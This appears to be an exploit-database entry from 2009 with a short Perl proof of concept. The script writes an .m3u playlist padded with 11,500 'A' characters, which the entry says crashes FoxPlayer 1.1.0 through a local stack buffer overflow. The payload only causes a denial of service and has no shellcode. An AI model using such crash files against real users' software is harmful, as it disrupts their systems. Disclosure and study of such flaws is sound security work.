[] NeoSense

FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)

Author: opt!x hacker
type: dos
platform: windows
port: 
date_added: 2009-08-06 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/perl
# FoxPlayer 1.1.0 (m3u) local stack overlow POC
#finded by opt!x hacker  <optix@9.cn>
#download : http://files.brothersoft.com/regnow/fox-player-setup.exe
my $header="#M3u";
my $crash="A" x 11500;
my $poc=$crash;
open(myfile,'>>AIDI.m3u');
print myfile $poc;

# milw0rm.com [2009-08-07]